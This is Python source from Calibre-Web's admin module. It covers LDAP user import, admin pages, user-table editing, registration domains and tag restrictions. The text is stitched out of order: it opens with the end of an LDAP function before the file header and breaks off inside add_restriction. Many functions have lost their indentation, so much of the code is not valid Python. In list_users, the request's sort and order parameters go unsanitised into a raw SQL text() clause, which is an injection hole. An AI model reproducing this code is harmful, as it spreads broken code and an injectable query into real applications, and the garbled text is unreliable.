        showtext['text'] = _(u'Error: No user returned in response of LDAP server')
        return json.dumps(showtext)
    imported = 0
    for username in new_users:
        user = username.decode('utf-8')
        # Entries containing '=' are full DNs and need the login attribute
        # extracted from the configured filter; bare values are used as-is.
        if '=' in user:
            # if member object field is empty take user object as filter
            if config.config_ldap_member_user_object:
                query_filter = config.config_ldap_member_user_object
            else:
                query_filter = config.config_ldap_user_object
            try:
                user_identifier = extract_user_identifier(user, query_filter)
            except Exception as ex:
                log.warning(ex)
                continue
        else:
            user_identifier = user
            query_filter = None
        try:
            user_data = services.ldap.get_object_details(user=user_identifier, query_filter=query_filter)
        except AttributeError as ex:
            log.debug_or_exception(ex)
            continue
        if user_data:
            user_count, message = ldap_import_create_user(user, user_data)
            if message:
                showtext['text'] = message
            else:
                imported += user_count
        else:
            log.warning("LDAP User: %s Not Found", user)
            showtext['text'] = _(u'At Least One LDAP User Not Found in Database')
    if not showtext:
        showtext['text'] = _(u'{} User Successfully Imported'.format(imported))
    return json.dumps(showtext)
def extract_user_data_from_field(user, field):
    """Return the value of ``field`` inside an LDAP DN-like string.

    Example: extract_user_data_from_field("cn=Jane,ou=x", "cn") -> "Jane".
    Raises Exception when the field is not present.
    """
    pattern = field + r"=([\.\d\s\w-]+)"
    found = re.search(pattern, user, re.IGNORECASE | re.UNICODE)
    if not found:
        raise Exception("Could Not Parse LDAP User: {}".format(user))
    return found.group(1)
def extract_dynamic_field_from_filter(user, filtr):
    """Return the attribute name bound dynamically (``<attr>=%s``) in an
    LDAP filter string.

    user  -- the user string, used only for the error message.
    filtr -- LDAP filter template, e.g. "(&(objectClass=person)(uid=%s))".

    Raises Exception when the filter contains no ``<attr>=%s`` placeholder.
    """
    match = re.search("([a-zA-Z0-9-]+)=%s", filtr, re.IGNORECASE | re.UNICODE)
    if match:
        return match.group(1)
    else:
        # Bug fix: the original passed ``user`` as a second Exception argument
        # instead of interpolating it, so the message was never formatted.
        raise Exception("Could Not Parse LDAP Userfield: {}".format(user))
def extract_user_identifier(user, filtr):
    """Resolve the login value for ``user`` using the dynamic attribute named
    by the LDAP filter ``filtr`` (the ``<attr>=%s`` placeholder)."""
    attribute = extract_dynamic_field_from_filter(user, filtr)
    return extract_user_data_from_field(user, attribute)
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler, GammaC0de, vuolter
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import re
import base64
import json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import login_required, current_user, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import func, or_, text
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
# Module-level logger for this blueprint.
log = logger.create()

# Feature availability flags, resolved once at import time from the optional
# service modules and runtime probes below.
feature_support = {
        'ldap': bool(services.ldap),
        'goodreads': bool(services.goodreads_support),
        'kobo': bool(services.kobo),
        'updater': constants.UPDATER_AVAILABLE,
        'gmail': bool(services.gmail)
    }

try:
    import rarfile  # pylint: disable=unused-import
    feature_support['rar'] = True
except (ImportError, SyntaxError):
    feature_support['rar'] = False

try:
    from .oauth_bb import oauth_check, oauthblueprints
    feature_support['oauth'] = True
except ImportError as err:
    # OAuth login is optional; fall back to empty provider structures so the
    # rest of the module can reference them unconditionally.
    log.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
    feature_support['oauth'] = False
    oauthblueprints = []
    oauth_check = {}

feature_support['gdrive'] = gdrive_support

# Blueprint that carries every admin route in this module.
admi = Blueprint('admin', __name__)
def admin_required(f):
    """
    View decorator: allow the request only when the logged-in user has the
    admin role (current_user.role_admin()); otherwise abort with 403.
    """
    @wraps(f)
    def inner(*args, **kwargs):
        if current_user.role_admin():
            return f(*args, **kwargs)
        abort(403)

    return inner
@admi.before_app_request
def before_request():
    """Populate per-request template globals and enforce session validity.

    Runs before every app request: refreshes the login session, logs out
    stale sessions, exposes config-derived globals on ``g``, and forces a
    redirect to the DB-configuration page while no database is configured.
    """
    # make remember me function work
    if current_user.is_authenticated:
        confirm_login()
    # Invalidate sessions whose id no longer matches the stored one
    # (e.g. after logout elsewhere); OPDS requests are exempt.
    if not ub.check_user_session(current_user.id, flask_session.get('_id')) and 'opds' not in request.path:
        logout_user()
    g.constants = constants
    g.user = current_user
    g.allow_registration = config.config_public_reg
    g.allow_anonymous = config.config_anonbrowse
    g.allow_upload = config.config_uploading
    g.current_theme = config.config_theme
    g.config_authors_max = config.config_authors_max
    g.shelves_access = ub.session.query(ub.Shelf).filter(
        or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == current_user.id)).order_by(ub.Shelf.name).all()
    # While the Calibre DB is unconfigured, only the endpoints needed to fix
    # that (and login/logout/static assets) are reachable.
    if '/static/' not in request.path and not config.db_configured and \
        request.endpoint not in ('admin.ajax_db_config',
                                 'admin.simulatedbchange',
                                 'admin.db_configuration',
                                 'web.login',
                                 'web.logout',
                                 'admin.load_dialogtexts',
                                 'admin.ajax_pathchooser'):
        return redirect(url_for('admin.db_configuration'))
@admi.route("/admin")
@login_required
def admin_forbidden():
abort(403)
@admi.route("/shutdown", methods=["POST"])
@login_required
@admin_required
def shutdown():
task = request.get_json().get('parameter', -1)
showtext = {}
if task in (0, 1): # valid commandos received
# close all database connections
calibre_db.dispose()
ub.dispose()
if task == 0:
showtext['text'] = _(u'Server restarted, please reload page')
else:
showtext['text'] = _(u'Performing shutdown of server, please close window')
# stop gevent/tornado server
web_server.stop(task == 0)
return json.dumps(showtext)
if task == 2:
log.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
showtext['text'] = _(u'Reconnect successful')
return json.dumps(showtext)
showtext['text'] = _(u'Unknown command')
return json.dumps(showtext), 400
@admi.route("/admin/view")
@login_required
@admin_required
def admin():
version = updater_thread.get_current_version_info()
if version is False:
commit = _(u'Unknown')
else:
if 'datetime' in version:
commit = version['datetime']
tz = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
form_date = datetime.strptime(commit[:19], "%Y-%m-%dT%H:%M:%S")
if len(commit) > 19: # check if string has timezone
if commit[19] == '+':
form_date -= timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
elif commit[19] == '-':
form_date += timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
commit = format_datetime(form_date - tz, format='short', locale=get_locale())
else:
commit = version['version']
allUser = ub.session.query(ub.User).all()
email_settings = config.get_mail_settings()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", allUser=allUser, email=email_settings, config=config, commit=commit,
feature_support=feature_support, kobo_support=kobo_support,
title=_(u"Admin page"), page="admin")
@admi.route("/admin/dbconfig", methods=["GET", "POST"])
@login_required
@admin_required
def db_configuration():
if request.method == "POST":
return _db_configuration_update_helper()
return _db_configuration_result()
@admi.route("/admin/config", methods=["GET"])
@login_required
@admin_required
def configuration():
return render_title_template("config_edit.html",
config=config,
provider=oauthblueprints,
feature_support=feature_support,
title=_(u"Basic Configuration"), page="config")
@admi.route("/admin/ajaxconfig", methods=["POST"])
@login_required
@admin_required
def ajax_config():
return _configuration_update_helper()
@admi.route("/admin/ajaxdbconfig", methods=["POST"])
@login_required
@admin_required
def ajax_db_config():
return _db_configuration_update_helper()
@admi.route("/admin/alive", methods=["GET"])
@login_required
@admin_required
def calibreweb_alive():
return "", 200
@admi.route("/admin/viewconfig")
@login_required
@admin_required
def view_configuration():
read_column = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
restrict_columns = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=read_column,
restrictColumns=restrict_columns,
languages=languages,
translations=translations,
title=_(u"UI Configuration"), page="uiconfig")
@admi.route("/admin/usertable")
@login_required
@admin_required
def edit_user_table():
visibility = current_user.view_settings.get('useredit', {})
languages = calibre_db.speaking_language()
translations = babel.list_translations() + [LC('en')]
allUser = ub.session.query(ub.User)
tags = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
custom_values = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
custom_values = []
if not config.config_anonbrowse:
allUser = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
users=allUser.all(),
tags=tags,
custom_values=custom_values,
translations=translations,
languages=languages,
visiblility=visibility,
all_roles=constants.ALL_ROLES,
kobo_support=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@admi.route("/ajax/listusers")
@login_required
@admin_required
def list_users():
off = int(request.args.get("offset") or 0)
limit = int(request.args.get("limit") or 10)
search = request.args.get("search")
sort = request.args.get("sort", "id")
order = request.args.get("order", "").lower()
state = None
if sort == "state":
state = json.loads(request.args.get("state", "[]"))
if sort != "state" and order:
order = text(sort + " " + order)
elif not state:
order = ub.User.id.asc()
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
total_count = filtered_count = all_user.count()
if search:
all_user = all_user.filter(or_(func.lower(ub.User.name).ilike("%" + search + "%"),
func.lower(ub.User.kindle_mail).ilike("%" + search + "%"),
func.lower(ub.User.email).ilike("%" + search + "%")))
if state:
users = calibre_db.get_checkbox_sorted(all_user.all(), state, off, limit, request.args.get("order", "").lower())
else:
users = all_user.order_by(order).offset(off).limit(limit).all()
if search:
filtered_count = len(users)
for user in users:
if user.default_language == "all":
user.default = _("All")
else:
user.default = LC.parse(user.default_language).get_language_name(get_locale())
table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": users}
js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
response = make_response(js_list)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/deleteuser", methods=['POST'])
@login_required
@admin_required
def delete_user():
user_ids = request.form.to_dict(flat=False)
users = None
if "userid[]" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id.in_(user_ids['userid[]'])).all()
elif "userid" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id == user_ids['userid'][0]).all()
count = 0
errors = list()
success = list()
if not users:
log.error("User not found")
return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
for user in users:
try:
message = _delete_user(user)
count += 1
except Exception as ex:
log.error(ex)
errors.append({'type': "danger", 'message': str(ex)})
if count == 1:
log.info("User {} deleted".format(user_ids))
success = [{'type': "success", 'message': message}]
elif count > 1:
log.info("Users {} deleted".format(user_ids))
success = [{'type': "success", 'message': _("{} users deleted successfully").format(count)}]
success.extend(errors)
return Response(json.dumps(success), mimetype='application/json')
@admi.route("/ajax/getlocale")
@login_required
@admin_required
def table_get_locale():
locale = babel.list_translations() + [LC('en')]
ret = list()
current_locale = get_locale()
for loc in locale:
ret.append({'value': str(loc), 'text': loc.get_language_name(current_locale)})
return json.dumps(ret)
@admi.route("/ajax/getdefaultlanguage")
@login_required
@admin_required
def table_get_default_lang():
languages = calibre_db.speaking_language()
ret = list()
ret.append({'value': 'all', 'text': _('Show All')})
for lang in languages:
ret.append({'value': lang.lang_code, 'text': lang.name})
return json.dumps(ret)
@admi.route("/ajax/editlistusers/<param>", methods=['POST'])
@login_required
@admin_required
def edit_list_user(param):
    """Inline-edit handler for the user table: change attribute *param*
    for one ('pk') or several ('pk[]') posted users.

    Returns "" on success, or an error text with HTTP 400.
    """
    vals = request.form.to_dict(flat=False)
    all_user = ub.session.query(ub.User)
    if not config.config_anonbrowse:
        # Hide the anonymous guest account unless anonymous browsing is on
        all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
    # only one user is posted
    if "pk" in vals:
        users = [all_user.filter(ub.User.id == vals['pk'][0]).one_or_none()]
    else:
        if "pk[]" in vals:
            users = all_user.filter(ub.User.id.in_(vals['pk[]'])).all()
        else:
            return _("Malformed request"), 400
    # to_dict(flat=False) wraps every field in a list; unwrap single values
    if 'field_index' in vals:
        vals['field_index'] = vals['field_index'][0]
    if 'value' in vals:
        vals['value'] = vals['value'][0]
    elif not ('value[]' in vals):
        return _("Malformed request"), 400
    for user in users:
        try:
            if param in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
                # Restriction lists: either bulk add/remove via id list,
                # or direct replacement with the posted string
                if 'value[]' in vals:
                    setattr(user, param, prepare_tags(user, vals['action'][0], param, vals['value[]']))
                else:
                    setattr(user, param, vals['value'].strip())
            else:
                vals['value'] = vals['value'].strip()
                if param == 'name':
                    if user.name == "Guest":
                        raise Exception(_("Guest Name can't be changed"))
                    user.name = check_username(vals['value'])
                elif param =='email':
                    user.email = check_email(vals['value'])
                elif param =='kobo_only_shelves_sync':
                    user.kobo_only_shelves_sync = int(vals['value'] == 'true')
                elif param == 'kindle_mail':
                    user.kindle_mail = valid_email(vals['value']) if vals['value'] else ""
                elif param.endswith('role'):
                    # 'field_index' carries the role bit to set/clear
                    value = int(vals['field_index'])
                    if user.name == "Guest" and value in \
                            [constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
                        raise Exception(_("Guest can't have this role"))
                    # check for valid value, last on checks for power of 2 value
                    if value > 0 and value <= constants.ROLE_VIEWER and (value & value-1 == 0 or value == 1):
                        if vals['value'] == 'true':
                            user.role |= value
                        elif vals['value'] == 'false':
                            if value == constants.ROLE_ADMIN:
                                # Refuse to strip the last remaining admin
                                if not ub.session.query(ub.User).\
                                        filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                               ub.User.id != user.id).count():
                                    return Response(
                                        json.dumps([{'type': "danger",
                                                     'message':_(u"No admin user remaining, can't remove admin role",
                                                                 nick=user.name)}]), mimetype='application/json')
                            user.role &= ~value
                        else:
                            raise Exception(_("Value has to be true or false"))
                    else:
                        raise Exception(_("Invalid role"))
                elif param.startswith('sidebar'):
                    # 'field_index' carries the sidebar-view bit to set/clear
                    value = int(vals['field_index'])
                    if user.name == "Guest" and value == constants.SIDEBAR_READ_AND_UNREAD:
                        raise Exception(_("Guest can't have this view"))
                    # check for valid value, last on checks for power of 2 value
                    if value > 0 and value <= constants.SIDEBAR_LIST and (value & value-1 == 0 or value == 1):
                        if vals['value'] == 'true':
                            user.sidebar_view |= value
                        elif vals['value'] == 'false':
                            user.sidebar_view &= ~value
                        else:
                            raise Exception(_("Value has to be true or false"))
                    else:
                        raise Exception(_("Invalid view"))
                elif param == 'locale':
                    if user.name == "Guest":
                        raise Exception(_("Guest's Locale is determined automatically and can't be set"))
                    if vals['value'] in _BABEL_TRANSLATIONS:
                        user.locale = vals['value']
                    else:
                        raise Exception(_("No Valid Locale Given"))
                elif param == 'default_language':
                    # Only accept languages actually present in the library
                    languages = calibre_db.session.query(db.Languages) \
                        .join(db.books_languages_link) \
                        .join(db.Books) \
                        .filter(calibre_db.common_filters()) \
                        .group_by(text('books_languages_link.lang_code')).all()
                    lang_codes = [lang.lang_code for lang in languages] + ["all"]
                    if vals['value'] in lang_codes:
                        user.default_language = vals['value']
                    else:
                        raise Exception(_("No Valid Book Language Given"))
                else:
                    return _("Parameter not found"), 400
        except Exception as ex:
            log.debug_or_exception(ex)
            return str(ex), 400
    ub.session_commit()
    return ""
@admi.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@admin_required
def update_table_settings():
    """Persist the admin's user-table column visibility settings (posted
    as raw JSON) into the current user's view_settings."""
    current_user.view_settings['useredit'] = json.loads(request.data)
    try:
        try:
            # In-place mutation of a JSON column isn't tracked by SQLAlchemy;
            # flag_modified forces the attribute to be written on commit.
            flag_modified(current_user, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        log.error("Invalid request received: {}".format(request))
        return "Invalid request", 400
    return ""
def check_valid_read_column(column):
    """Return True when *column* is "0" (feature disabled) or names an
    existing boolean custom column that is not marked for deletion."""
    if column == "0":
        return True
    matches = calibre_db.session.query(db.Custom_Columns) \
        .filter(db.Custom_Columns.id == column) \
        .filter(and_(db.Custom_Columns.datatype == 'bool',
                     db.Custom_Columns.mark_for_delete == 0)).all()
    return bool(matches)
def check_valid_restricted_column(column):
    """Return True when *column* is "0" (feature disabled) or names an
    existing text custom column that is not marked for deletion."""
    if column == "0":
        return True
    matches = calibre_db.session.query(db.Custom_Columns) \
        .filter(db.Custom_Columns.id == column) \
        .filter(and_(db.Custom_Columns.datatype == 'text',
                     db.Custom_Columns.mark_for_delete == 0)).all()
    return bool(matches)
@admi.route("/admin/viewconfig", methods=["POST"])
@login_required
@admin_required
def update_view_configuration():
    """Persist the 'View Configuration' admin form (titles, paging,
    default role and sidebar visibilities) and re-render the page."""
    to_save = request.form.to_dict()
    _config_string(to_save, "config_calibre_web_title")
    _config_string(to_save, "config_columns_to_ignore")
    if _config_string(to_save, "config_title_regex"):
        # Title-sort regex changed -> recompute the stored title sort keys
        calibre_db.update_title_sort(config)
    # Reject the form early if the chosen custom columns no longer exist
    if not check_valid_read_column(to_save.get("config_read_column", "0")):
        flash(_(u"Invalid Read Column"), category="error")
        log.debug("Invalid Read column")
        return view_configuration()
    _config_int(to_save, "config_read_column")
    if not check_valid_restricted_column(to_save.get("config_restricted_column", "0")):
        flash(_(u"Invalid Restricted Column"), category="error")
        log.debug("Invalid Restricted Column")
        return view_configuration()
    _config_int(to_save, "config_restricted_column")
    _config_int(to_save, "config_theme")
    _config_int(to_save, "config_random_books")
    _config_int(to_save, "config_books_per_page")
    _config_int(to_save, "config_authors_max")
    _config_string(to_save, "config_default_language")
    _config_string(to_save, "config_default_locale")
    config.config_default_role = constants.selected_roles(to_save)
    config.config_default_role &= ~constants.ROLE_ANONYMOUS
    # Checked 'show_<bit>' checkboxes are summed into the sidebar bitmask
    config.config_default_show = sum(int(k[5:]) for k in to_save if k.startswith('show_'))
    if "Show_detail_random" in to_save:
        config.config_default_show |= constants.DETAIL_RANDOM
    config.save()
    flash(_(u"Calibre-Web configuration updated"), category="success")
    log.debug("Calibre-Web configuration updated")
    before_request()
    return view_configuration()
@admi.route("/ajax/loaddialogtexts/<element_id>", methods=['POST'])
@login_required
def load_dialogtexts(element_id):
    """Return the confirmation-dialog body text for *element_id* as JSON
    ({"header": "", "main": <text>, "valid": 1}); unknown ids yield an
    empty main text."""
    messages = {
        "config_delete_kobo_token": _('Do you really want to delete the Kobo Token?'),
        "btndeletedomain": _('Do you really want to delete this domain?'),
        "btndeluser": _('Do you really want to delete this user?'),
        "delete_shelf": _('Are you sure you want to delete this shelf?'),
        "select_locale": _('Are you sure you want to change locales of selected user(s)?'),
        "select_default_language": _('Are you sure you want to change visible book languages for selected user(s)?'),
        "role": _('Are you sure you want to change the selected role for the selected user(s)?'),
        "restrictions": _('Are you sure you want to change the selected restrictions for the selected user(s)?'),
        "sidebar_view": _('Are you sure you want to change the selected visibility restrictions for the selected user(s)?'),
        "kobo_only_shelves_sync": _('Are you sure you want to change shelf sync behavior for the selected user(s)?'),
        "db_submit": _('Are you sure you want to change Calibre library location?'),
        "btnfullsync": _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?"),
    }
    texts = {"header": "", "main": messages.get(element_id, ""), "valid": 1}
    return json.dumps(texts)
@admi.route("/ajax/editdomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def edit_domain(allow):
    """Rename a registration-domain pattern; wildcards * and ? are stored
    as the SQL LIKE wildcards % and _."""
    # POST /post
    # name: 'username', //name of field (column in db)
    # pk: 1 //primary key (record id)
    # value: 'superuser!' //new value
    vals = request.form.to_dict()
    answer = ub.session.query(ub.Registration).filter(ub.Registration.id == vals['pk']).first()
    # NOTE(review): 'answer' is None if the posted pk no longer exists, which
    # would raise AttributeError on the next line - confirm the UI guarantees
    # a valid pk.
    answer.domain = vals['value'].replace('*', '%').replace('?', '_').lower()
    return ub.session_commit("Registering Domains edited {}".format(answer.domain))
@admi.route("/ajax/adddomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def add_domain(allow):
    """Add a registration-domain pattern to the allow (allow=1) or deny
    (allow=0) list; an existing identical entry is silently ignored.
    Wildcards * and ? are stored as SQL LIKE wildcards % and _."""
    domain_name = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
    check = ub.session.query(ub.Registration).filter(ub.Registration.domain == domain_name)\
        .filter(ub.Registration.allow == allow).first()
    if not check:
        new_domain = ub.Registration(domain=domain_name, allow=allow)
        ub.session.add(new_domain)
        ub.session_commit("Registering Domains added {}".format(domain_name))
    return ""
@admi.route("/ajax/deletedomain", methods=['POST'])
@login_required
@admin_required
def delete_domain():
    """Delete the registration-domain entry given by the posted
    'domainid'; missing form field is ignored (KeyError swallowed)."""
    try:
        domain_id = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
        ub.session.query(ub.Registration).filter(ub.Registration.id == domain_id).delete()
        ub.session_commit("Registering Domains deleted {}".format(domain_id))
        # If last domain was deleted, add all domains by default
        if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
            new_domain = ub.Registration(domain="%.%", allow=1)
            ub.session.add(new_domain)
            ub.session_commit("Last Registering Domain deleted, added *.* as default")
    except KeyError:
        pass
    return ""
@admi.route("/ajax/domainlist/<int:allow>")
@login_required
@admin_required
def list_domain(allow):
    """Return the allow/deny registration-domain list as JSON, mapping the
    stored SQL wildcards %/_ back to */? for display."""
    answer = ub.session.query(ub.Registration).filter(ub.Registration.allow == allow).all()
    json_dumps = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in answer])
    # NOTE(review): the double dumps plus quote swapping below re-encodes the
    # JSON string with single quotes, strips the outer quotes, then restores
    # double quotes - presumably an escaping workaround for the consuming JS
    # widget; confirm before simplifying.
    js = json.dumps(json_dumps.replace('"', "'")).lstrip('"').strip('"')
    response = make_response(js.replace("'", '"'))
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@admi.route("/ajax/editrestriction/<int:res_type>", defaults={"user_id": 0}, methods=['POST'])
@admi.route("/ajax/editrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def edit_restriction(res_type, user_id):
    """Rename an existing allow/deny restriction entry in place.

    The posted element id is 'a<index>' (allow list) or 'd<index>' (deny
    list); res_type selects template tags (0), template custom-column
    values (1), per-user tags (2) or per-user column values (3).
    """
    element = request.form.to_dict()
    if element['id'].startswith('a'):
        if res_type == 0:  # Tags as template
            elementlist = config.list_allowed_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_allowed_tags = ','.join(elementlist)
            config.save()
        if res_type == 1:  # CustomC
            elementlist = config.list_allowed_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_allowed_column_value = ','.join(elementlist)
            config.save()
        if res_type == 2:  # Tags per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_allowed_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.allowed_tags = ','.join(elementlist)
            ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.allowed_tags))
        if res_type == 3:  # CColumn per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_allowed_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.allowed_column_value = ','.join(elementlist)
            ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name, usr.allowed_column_value))
    if element['id'].startswith('d'):
        if res_type == 0:  # Tags as template
            elementlist = config.list_denied_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_denied_tags = ','.join(elementlist)
            config.save()
        if res_type == 1:  # CustomC
            elementlist = config.list_denied_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            config.config_denied_column_value = ','.join(elementlist)
            config.save()
        if res_type == 2:  # Tags per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_denied_tags()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.denied_tags = ','.join(elementlist)
            ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.denied_tags))
        if res_type == 3:  # CColumn per user
            if isinstance(user_id, int):
                usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
            else:
                usr = current_user
            elementlist = usr.list_denied_column_values()
            elementlist[int(element['id'][1:])] = element['Element']
            usr.denied_column_value = ','.join(elementlist)
            ub.session_commit("Changed denied columns of user {} to {}".format(usr.name, usr.denied_column_value))
    return ""
def restriction_addition(element, list_func):
    """Append element['add_element'] to the comma-separated restriction
    list produced by *list_func* (unless already present) and return the
    re-joined string."""
    entries = list_func()
    if entries == ['']:
        # an empty stored value splits into [''] - treat as no entries
        entries = []
    candidate = element['add_element']
    if candidate not in entries:
        entries.append(candidate)
    return ','.join(entries)
def restriction_deletion(element, list_func):
    """Remove the first occurrence of element['Element'] from the
    restriction list produced by *list_func* (if present) and return the
    re-joined string."""
    entries = list_func()
    target = element['Element']
    if target in entries:
        entries.remove(target)
    return ','.join(entries)
def prepare_tags(user, action, tags_name, id_list):
    """Resolve *id_list* (tag ids, or restricted-column value ids) to
    their names/values and add them to or remove them from the user's
    comma-separated restriction attribute *tags_name*.

    Returns the new comma-joined string; raises on unknown tag ids or an
    unknown *action* (only "add" / "remove" are valid).
    """
    if "tags" in tags_name:
        tags = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(id_list)).all()
        if not tags:
            raise Exception(_("Tag not found"))
        new_tags_list = [x.name for x in tags]
    else:
        # Non-tag restrictions target the configured restricted custom column
        tags = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
            .filter(db.cc_classes[config.config_restricted_column].id.in_(id_list)).all()
        new_tags_list = [x.value for x in tags]
    # Empty attribute would split into [''] - start from an empty list instead
    saved_tags_list = user.__dict__[tags_name].split(",") if len(user.__dict__[tags_name]) else []
    if action == "remove":
        saved_tags_list = [x for x in saved_tags_list if x not in new_tags_list]
    elif action == "add":
        saved_tags_list.extend(x for x in new_tags_list if x not in saved_tags_list)
    else:
        raise Exception(_("Invalid Action"))
    return ",".join(saved_tags_list)
@admi.route("/ajax/addrestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def add_user_0_restriction(res_type):
    """Template-level variant of add_restriction: user_id 0 targets the
    configuration template rather than a specific user."""
    return add_restriction(res_type, user_id=0)
@admi.route("/ajax/addrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def add_restriction(res_type, user_id):
    """Add one allow/deny restriction entry.

    res_type selects the target: 0 = template tags, 1 = template
    custom-column values, 2 = per-user tags, 3 = per-user custom-column
    values.  The posted form carries the new entry in 'add_element' plus
    either 'submit_allow' or 'submit_deny' to pick the list.
    """
    element = request.form.to_dict()
    if res_type == 0:  # Tags as template
        if 'submit_allow' in element:
            config.config_allowed_tags = restriction_addition(element, config.list_allowed_tags)
            config.save()
        elif 'submit_deny' in element:
            config.config_denied_tags = restriction_addition(element, config.list_denied_tags)
            config.save()
    if res_type == 1:  # CCustom as template
        # Bugfix: the allowed/denied list getters were swapped here, so a new
        # entry was merged into the *other* list's current contents (compare
        # the symmetric res_type 0/2/3 branches).
        if 'submit_allow' in element:
            config.config_allowed_column_value = restriction_addition(element, config.list_allowed_column_values)
            config.save()
        elif 'submit_deny' in element:
            config.config_denied_column_value = restriction_addition(element, config.list_denied_column_values)
            config.save()
    if res_type == 2:  # Tags per user
        if isinstance(user_id, int):
            usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
        else:
            usr = current_user
        if 'submit_allow' in element:
            usr.allowed_tags = restriction_addition(element, usr.list_allowed_tags)
